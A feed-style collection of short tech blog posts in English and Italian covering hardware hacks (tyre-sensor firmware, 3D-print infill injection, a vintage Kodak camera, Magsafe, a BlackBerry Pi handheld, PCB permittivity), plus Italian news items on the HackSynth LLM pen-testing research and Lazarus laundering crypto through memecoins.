[Wintergatan]’s marble machine started out great and has only gotten better over the years, with [Martin] tirelessly documenting his improvements on everything. After all, when every note is the product of multiple physical processes that must synchronize flawlessly, it makes sense to spend time doing things like designing the best method of dropping balls.
One final note: if you are the type of person to find yourself interested and engaged by these sorts of systems and their relation to obtaining better results and tighter tolerances, we have a great book recommendation for you.
youtube.com/embed/jJkoZgKVEx8?…
Reverse-Engineering SKS Airspy Tire Pressure Sensors for Custom Firmware
Although a somewhat common feature on cars these days, tire pressure sensors (TPS) are also useful on bicycles. The SKS Airspy range of TPS products is one such example, which enables remote monitoring of the air pressure either to a special smartphone app (SKS MYBIKE) or to a Garmin device. Of course, proprietary solutions like this require reverse-engineering to liberate the hardware from nasty proprietary firmware limitations, which is exactly what [bitmeal] did with a custom firmware project.
Rather than the proprietary and closed communication protocol, the goal was to use the open ANT+ sensor instead, specifically the (non-certified) TPS profile which is supported by a range of cycling computers. Before this could happen the Airspy TPS hardware had to be first reverse-engineered so that new firmware could be developed and flashed. These devices use the nRF52832 IC, meaning that development tools are freely available. Flashing the custom firmware requires gaining access to the SWD interface, which will very likely void the warranty on a $160 – 240 device.
The SWD programmer is then attached to the 1.27 mm spaced SWD holes per the instructions on the GitHub page. After flashing the provided .hex file you can then connect to the TPS as an ANT+ device, but instructions are also provided for developing your own firmware.
Infill Injection Experiment Makes Stronger Parts
[JanTec Engineering] was fascinated by the idea of using a 3D printer’s hot end to inject voids and channels in the infill with molten plastic, leading to stronger prints without the need to insert hardware or anything else. Inspiration came from two similar ideas: z-pinning which creates hollow vertical channels that act as reinforcements when filled with molten plastic by the hot end, and VoxelFill (patented by AIM3D) which does the same, but with cavities that are not uniform for better strength in different directions. Craving details? You can read the paper on z-pinning, and watch VoxelFill in (simulated) action or browse the VoxelFill patent.
With a prominent disclaimer that his independent experiments are not a copy of VoxelFill nor are they performing or implying patent infringement, [JanTec] goes on to use a lot of custom G-code (and suffers many messy failures) to perform some experiments and share what he learned.
One big finding is that one can’t simply have an empty cylinder inside the print and expect to fill it all up in one go. Molten plastic begins to cool immediately after leaving a 3D printer’s nozzle, and won’t make it very far down a deep hole before it cools and hardens. One needs to fill a cavity periodically rather than all in one go. And it’s better to fill it from the bottom-up rather than from the top-down.
He got better performance by modifying his 3D printer’s hot end with an airbrush nozzle, which gave about 4 mm of extra length to work with. This extra long nozzle could reach down further into cavities, and fill them from the bottom-up for better results. Performing the infill injection at higher temperatures helped fill the cavities more fully, as well.
Another thing learned is that dumping a lot of molten plastic into a 3D print risks deforming the print because the injected infill brings a lot of heat with it. This can be mitigated by printing the object with more perimeters and a denser infill so that there’s more mass to deal with the added heat, but it’s still a bit of a trouble point.
[JanTec] put his testing hardware to use and found that parts with infill injection were noticeably more impact resistant than without. But when it came to stiffness, an infill injected part resisted bending only a little better than a part without, probably because the test part is very short and the filled cavities can’t really shine in that configuration.
These are just preliminary results, but got him thinking there are maybe there are possibilities with injecting materials other than the one being used to print the object itself. Would a part resist bending more if it were infill injected with carbon-fibre filament? We hope he does some follow-up experiments; we’d love to see the results.
youtube.com/embed/H7nrJRBAMOA?…
We’re Hiring: Come Join Us!
You wake up in the morning, and check Hackaday over breakfast. Then it’s off to work or school, where you’ve already had to explain the Jolly Wrencher to your shoulder-surfing colleagues. And then to a hackspace or back to your home lab, stopping by the skull-and-cross-wrenches while commuting, naturally. You don’t bleed red, but rather #F3BF10. It’s time we talked.
The Hackaday writing crew goes to great lengths to cover all that is interesting to engineers and enthusiasts. We find ourselves stretched a bit thin and it’s time to ask for help. Want to lend a hand while making some extra dough to plow back into your projects? We’re looking for contributors to write a few articles per week and keep the Hackaday flame burning.
Contributors are hired as private contractors and paid for each article. You should have the technical expertise to understand the projects you write about, and a passion for the wide range of topics we feature. You’ll have access to the Hackaday Tips Line, and we count on your judgement to help us find the juicy nuggets that you’d want to share with your hacker friends.
If you’re interested, please email our jobs line (jobs at hackaday dot com) and include:
- One example article written in the voice of Hackaday. Include a banner image, between 150 and 300 words, the link to the project, and any in-links to related and relevant Hackaday features. We need to know that you can write.
- Details about your background (education, employment, interests) that make you a valuable addition to the team. What do you like, and what do you do?
- Links to your blog/project posts/etc. that have been published on the Internet, if any.
Questions? Don’t hesitate to ask below. Ladies and Gentlemen, start your applications!
DK 9x19 - Benvenuti nel mondo nuovo
Un mese di Trump è bastato per fare piazza pulita dei baluardi concettuali usciti dalla seconda guerra mondiale: l'Occidente e la NATO. L'Occidente è ora solo l'Europa, e la NATO è poco più di un'etichetta. Pazzesco, ma il solo senso dell'Europa ora è solo essere all'altezza del mondo nuovo.
spreaker.com/episode/dk-9x19-b…
Custom Frame Grabber Gets Vintage Kodak Digital Camera Back in the Game
What do you do with a four-megapixel monochrome digital camera from the 90s that needed a dedicated PC with a frame grabber card to do anything useful? Easy — you turn it into a point-and-shoot by building your own frame grabber.
At least that’s what [Frost Sheridan] did with a vintage Kodak MegaPlus 4.2i, a camera that was aimed at the industrial and scientific market at a time when everyone was still using film for snapshots. Making this workhorse ride again meant diving into the manual, luckily still available after all these years, and figuring out what pins on the 68 pin connector would be useful. [Frost] worked out the pins for serial commands plus the 10-bit parallel interface, although he settled for the eight most significant bits to make things simpler. A Teensy with some extra RAM and a serial interface chip takes care of sending commands to the camera and pulling pixels off the parallel interface, and a 128×160 LCD provides a much-needed viewfinder.
With a battery pack mounted the whole thing is reasonably portable, if a bit of a chore to use. It’s worth the effort, though; the picture quality is fantastic, with a wide dynamic range and plenty of contrast. Hats off to [Frost] for bringing this beauty back to life without making any permanent modifications to it.
Tech In Plain Sight: Magsafe, and How To Roll Your Own
Apple likes magnets. They started out with magnetic laptop chargers and then graduated to a system that magnetically holds the phone, charges it, and can facilitate communication between the phone and a charger or other device. Even if you are like me and have no Apple devices, you can retrofit other phones to use Magsafe accessories. In fact, with a little work, you can build your own devices. Regardless, the technology is a clever and simple hack, and we are just a little sorry we didn’t think of it.
Terms
Using a magnet to attach a phone isn’t a new idea. But, historically, the phone had either a metal back or an adhesive metal plate attached that would stick to the magnet. This wouldn’t necessarily help with charging, but was perfectly fine for holding the device. The problem is, it is hard to wirelessly charge the phone through the metal.
Magsafe can do several different things. Obviously, it can attach the phone magnetically. However, since it is a ring shape, you can still have a charging coil in the middle of the ring. Better still, the Magsafe system will align the phone and charger with a satisfying click when you put them together.
In addition, a Magsafe device can have an NFC communication point just below the ring. This can allow, for example, a phone and a charger to negotiate for current or communicate charge level. For the purposes of this post, I’m mostly thinking about the magnetic attachment. Assuming you have two charging coils and two NFC points aligned, it is easy to figure out how charging and communication take place.
The Magsafe Way
Wireless charging relies on the coils in the charger and the device being reasonably well aligned, otherwise the losses increase rapidly. A simple magnet and plate system would allow you to attach the phone in a variety of ways and that won’t assure that the charging coil will line up.
If you think about how to solve the magnet and charging problem, it might make sense to move the magnets into a circle, leaving the center free for charging. That still doesn’t help with alignment, though. Magsafe actually uses two magnetic rings. One presents a north magnetic pole, and the other presents a south magnetic pole. Obviously, the mating ring has the poles swapped.
Deep into an old Apple Video, you can find the adjacent image of how the whole system goes together, but it hides a lot of detail in the phrase “magnet array.”\
However, Apple has a public document that describes, among other things, all the requirements for working with Magsafe. We imagine there might be more details if you join their Mfi program, but that’s hardly necessary.
Section 37 of the document goes into plenty of detail, including the materials for the magnet, the dimensions, and the positioning. It even covers how to test the various parameters. It reveals that you can have a simple ring if you don’t care about orientation, or incorporate a ring and an alignment magnet to ensure the devices mate in a particular way.
The real key, though, is the cross-sectional views. These show how each ring is made of thin magnets. Keep in mind that this figure is just one part of the ring. There is an identical section across the center of the ring to the right.
If present, the orientation magnet also has multiple magnetic faces. This alignment is perfect for wireless charging since the coils will line up directly. In addition, the NFC connection allows the phone and a compatible charger to negotiate for a faster charge rate.
No Apple, No Problem
These days, you can find cases for many phones that will provide attachment rings. You can also just buy rings. Some rings are metallic, so they’ll stick but don’t necessarily align. For alignment, you need magnets on both sides. You’ll notice that some rings are thicker than others. In general, rings that will be close to their mating ring can be thinner than rings that are made to go inside, for example, a case.
The availability of rings means that you can craft your own accessories or even faux phones (e..g., a ring on your digital meter). If you want charging, you can also get “pucks” that have everything ready to go and insert them into a 3D print like [Alien Gaming] did in the video below.
youtube.com/embed/Q6reBmekPhM?…
There are plenty of commercial accessories to inspire you. (Or will they tempt you to buy instead of make?) You can get a notepad and pen, for example, that snaps to the back of your phone. There are camera grips, tripods, wallets, and probably more. [Michael Vance] rounds up some of the stranger ones in the video below.
youtube.com/embed/Azi5lS8lLU0?…
What cool ideas can you dream up for either Magsafe accessories or hosts? You could probably make a very phone-specific attachment to put a telephoto lens in front of your camera, for example. Keep in mind that you could talk WiFi or Bluetooth to the phone, too, so a satellite phone back could work. Sure, some of these wouldn’t meet the Apple spec, but they could still be done.
If you miss the old-style laptop magnetic connectors, you can roll your own. If you haven’t looked at the Apple documentation, we’ve been impressed with it
HackSynth: il Futuro del Penetration Testing Assistito con i Large Language Model
Un team di ricercatori dell’Università della California, Berkeley, e del Center for AI Safety ha sviluppato HackSynth, un sistema avanzato basato su Large Language Models (LLM) per l’automazione dei penetration test.
Questa ricerca mira a colmare una lacuna critica nella cybersecurity: l’assenza di strumenti realmente autonomi ed efficaci per l’identificazione delle vulnerabilità nei sistemi informatici.
Breach And Attack Simulation (BAS) ancora immaturi
Attualmente, il penetration testing è un processo essenziale ma costoso e altamente specializzato. Le aziende investono risorse significative per individuare e mitigare le vulnerabilità, ma a causa dell’elevato costo e della complessità delle operazioni, il numero di test eseguibili è limitato.
Inoltre, i sistemi BAS (Breach and Attack Simulation) disponibili oggi non sono in grado di sostituire completamente i penetration tester umani, in quanto si basano su regole predefinite e scenari limitati, senza la capacità di un “pensiero laterale” efficace come come quello umano.
HackSynth si propone di superare queste limitazioni introducendo un’architettura avanzata, suddivisa in due componenti principali: il “Planner” e il “Summarizer”. Il Planner genera ed esegue comandi per testare le vulnerabilità, mentre il Summarizer analizza le risposte del sistema target, adattando dinamicamente la strategia di attacco in base ai risultati ottenuti.
Due Banchmark per valutare i risultati
Per valutare l’efficacia di HackSynth, i ricercatori hanno sviluppato due benchmark basati sulle piattaforme PicoCTF e OverTheWire (che abbiamo già incontrato in precedenza), che comprendono un totale di 200 sfide suddivise per difficoltà e ambiti di cybersecurity. I test hanno mostrato che HackSynth, utilizzando il modello GPT-4o, ha completato con successo il 20,5% delle sfide su PicoCTF e il 16% su OverTheWire.
Un aspetto critico emerso dai test è l’importanza della regolazione dei parametri del modello per massimizzare le prestazioni. In particolare, la temperatura di generazione influisce direttamente sulla coerenza dei comandi prodotti: valori più bassi aumentano la precisione, mentre temperature più elevate favoriscono una maggiore esplorazione, talvolta a scapito dell’efficacia complessiva. Sperimentazioni con temperature tra 0,8 e 1,0 hanno permesso di trovare un equilibrio ottimale tra diversità e accuratezza.
HackSynth è disponibile online per testing e prova
Per garantire un utilizzo sicuro, HackSynth opera in ambienti containerizzati e utilizza whitelist di rete per limitare le azioni a domini autorizzati, riducendo il rischio di esecuzione di comandi dannosi o non previsti. La disponibilità pubblica di HackSynth e dei relativi benchmark mira a stimolare ulteriori ricerche sulla cybersecurity autonoma, con l’obiettivo di migliorare le tecniche di attacco simulato e rafforzare la difesa delle infrastrutture digitali.
In sintesi, HackSynth rappresenta un importante passo avanti verso l’automazione del penetration testing, dimostrando che i modelli LLM possono essere strumenti efficaci per individuare vulnerabilità in modo scalabile ed efficiente. Tuttavia, ulteriori sviluppi saranno necessari per incrementare la sicurezza, l’affidabilità e l’adattabilità di questi sistemi a scenari di attacco sempre più complessi.
L'articolo HackSynth: il Futuro del Penetration Testing Assistito con i Large Language Model proviene da il blog della sicurezza informatica.
Lazarus How-To: Come riciclare 1,46 Miliardi di dollari in Criptovalute?
Gli hacker del gruppo Lazarus, che hanno effettuato il “Colpo Grosso” rubando 1,46 miliardi di dollari a Bybit hanno iniziato a riciclare parte dei fondi rubati tramite memecoin. Gli esperti sostengono che nell’operazione sia coinvolto il gruppo nordcoreano Lazarus.
Lazarus usa una piattaforma sulla blockchain di Solana per la legalizzazione dei beni rubati. Durante le indagini è emerso che il gruppo ha trasferito 50 SOL (circa 8.000 dollari) su un portafoglio associato al lancio del token QinShihuang. Dopo poco tempo la sua capitalizzazione raggiunse i 3 milioni di dollari e il volume giornaliero degli scambi superò i 44 milioni di dollari.
Gli esperti spiegano che gli hacker statali hanno sottratto liquidità reale agli utenti di Pump.fun, mixandola con fondi rubati. Una volta che le risorse hanno ottenuto sufficiente popolarità, gli hacker hanno venduto i token, incassato i proventi e li hanno distribuiti su più portafogli, rendendoli difficili da tracciare.
Sebbene la quantità riciclata sia significativamente inferiore agli 1,46 miliardi di dollari rubati, gli analisti avvertono che potrebbe trattarsi solo di un’operazione di prova. Se il metodo si rivelasse efficace, Lazarus potrebbe continuare a utilizzarlo in futuro.
Un rappresentante di Coinbase ha riportato di un altro episodio che ha attirato l’attenzione. Qualcuno ha inviato alla Corea del Nord il memecoin Lazerus, che è stato poi scambiato con migliaia di dollari in SOL. L’esperto ha ricordato ai trader di criptovalute che tutte le transazioni finanziarie con la RPDC costituiscono un crimine internazionale.
Ulteriori indagini hanno rivelato che Lazarus potrebbe essere dietro diversi lanci di memecoin tramite Pump.fun. Il ricercatore ZachXBT, che in precedenza aveva dimostrato il coinvolgimento del gruppo nell’attacco informatico di Bybit, ha poi scoperto oltre 920 portafogli che hanno ricevuto fondi dai beni rubati. Tutti i token sono stati successivamente trasferiti a vari exchange e servizi.
Gli analisti sottolineano che l’uso di memecoin e piattaforme DeFi sta diventando una tattica popolare per riciclare fondi rubati. Tuttavia, la crescente attenzione da parte delle forze dell’ordine e degli analisti potrebbe rendere la cosa più difficile.
Cosa sono i memecoin
Le memecoin sono criptovalute nate principalmente come scherzi o riferimenti a meme di internet, ma che talvolta acquisiscono valore grazie alla speculazione e alla viralità.
A differenza delle criptovalute tradizionali come Bitcoin o Ethereum, le memecoin spesso non hanno una reale utilità tecnologica e il loro prezzo è fortemente influenzato dalla community, dai trend sui social media e dal supporto di personaggi influenti (come Elon Musk con Dogecoin).
Esempi famosi di memecoin includono:
- Dogecoin (DOGE) – Nato come parodia di Bitcoin, ispirato al meme del cane Shiba Inu.
- Shiba Inu (SHIB) – Creato per competere con Dogecoin, ha sviluppato una community enorme.
- PepeCoin (PEPE) – Basato sul meme di Pepe the Frog, diventato virale nel 2023.
Le memecoin sono altamente volatili e spesso soggette a pump and dump, quindi vengono considerate investimenti ad alto rischio.
L'articolo Lazarus How-To: Come riciclare 1,46 Miliardi di dollari in Criptovalute? proviene da il blog della sicurezza informatica.
BlackBerry Keyboard Makes This Handheld Pi Stand Out
In the decade or more since small inexpensive Linux-capable single board computers such as the Raspberry Pi came to the mainstream, many a hardware hacker has turned their attention to making a portable computer using one. With such a plethora of devices having been made one might think that the Pi handheld was a done deal, but every so often along comes a new one of such quality to re-ignite the genre. So it is with [Taylor Hay]’s BlackberryPi Handheld. As you might guess from the name, it uses a BlackBerry keyboard along with a square LCD screen to create a beautifully executed Pi handheld in an almost GameBoy-like form factor.
It starts with a beautifully designed and executed case that holds a Pi and a Pimoroni HyperPixel screen. Unexpectedly this is a full-size Pi, we think a Pi 4. The keyboard is a USB enhanced Blackberry module which also has the famous trackpad, and there’s a bezel on the front to protect the screen. The power meanwhile comes from three 18650 cells inside the back of the case, with a power bank PCB. The surprise here is how simple he’s made it by careful choice of modules, the usual rats-nest of wires is missing.
The files are available so you can make your own, and he’s actively encouraging people to remix and improve it. We like this project, a lot, and after you’ve seen the video below the break, we think you will too. Oddly, this isn’t the first time we’ve seen someone try this combination.
youtube.com/embed/ogmrAbKipak?…
PCB Dielectric Constant Measurements, Three Ways
FR4 is FR4, right? For a lot of PCB designs, the answer is yes — the particular characteristics of the substrate material don’t impact your design in any major way. But things get a little weird up in the microwave range, and having one of these easy methods to measure the dielectric properties of your PCB substrate can be pretty handy.
The RF reverse-engineering methods [Gregory F. Gusberti] are deceptively simple, even if they require some fancy test equipment. But if you’re designing circuits with features like microstrip filters where the permittivity of the substrate would matter, chances are pretty good you already have access to such gear. The first method uses a ring resonator, which is just a PCB with a circular microstrip of known circumference. Microstrip feedlines approach but don’t quite attach to the ring, leaving a tiny coupling gap. SMA connectors on the feedline connect the resonator to a microwave vector network analyzer in S21 mode. The resonant frequencies show up as peaks on the VNA, and can be used to calculate the effective permittivity of the substrate.
Method two is similar in that it measures in the frequency domain, but uses a pair of microstrip stubs of different lengths. The delta between the lengths is used to cancel out the effect of the SMA connectors, and the phase delay difference is used to calculate the effective permittivity. The last method is a time domain measurement using a single microstrip with a couple of wider areas. A fast pulse sent into this circuit will partially reflect off these impedance discontinuities; the time delay between the reflections is directly related to the propagation speed of the wave in the substrate, which allows you to calculate its effective permittivity.
One key takeaway for us is the concept of effective permittivity, which considers the whole environment of the stripline, including the air above the traces. We’d imagine that if there had been any resist or silkscreen near the traces it would change the permittivity, too, making measurements like these all the more important.
youtube.com/embed/-Or-rcEIc7o?…